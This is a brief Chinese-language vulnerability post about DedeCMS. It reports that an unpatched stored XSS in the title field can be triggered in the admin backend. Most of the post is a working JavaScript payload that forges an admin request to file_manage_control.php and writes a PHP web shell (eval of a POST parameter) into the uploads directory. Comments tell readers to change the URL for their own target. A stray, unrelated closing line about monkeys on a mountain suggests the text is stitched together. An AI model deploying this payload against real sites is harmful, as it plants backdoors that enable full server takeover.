dedecms的漏洞很多,但是厂商都是不做修复。之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。
后台可触发xss
利用js代码
var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();if(request.overrideMimeType) {request.overrideMimeType('text/xml');}} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}xmlhttp=request; getshell();function getshell(){ var postStr="fmdo=edit&backurl=&activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改 xmlhttp.open("POST", "http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php", true);//url需要自己修改xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length", postStr.length);xmlhttp.setRequestHeader("Connection", "close");xmlhttp.send(postStr);}
触发前
触发后
你看报表时,梅里雪山的金丝猴刚好爬上树尖。
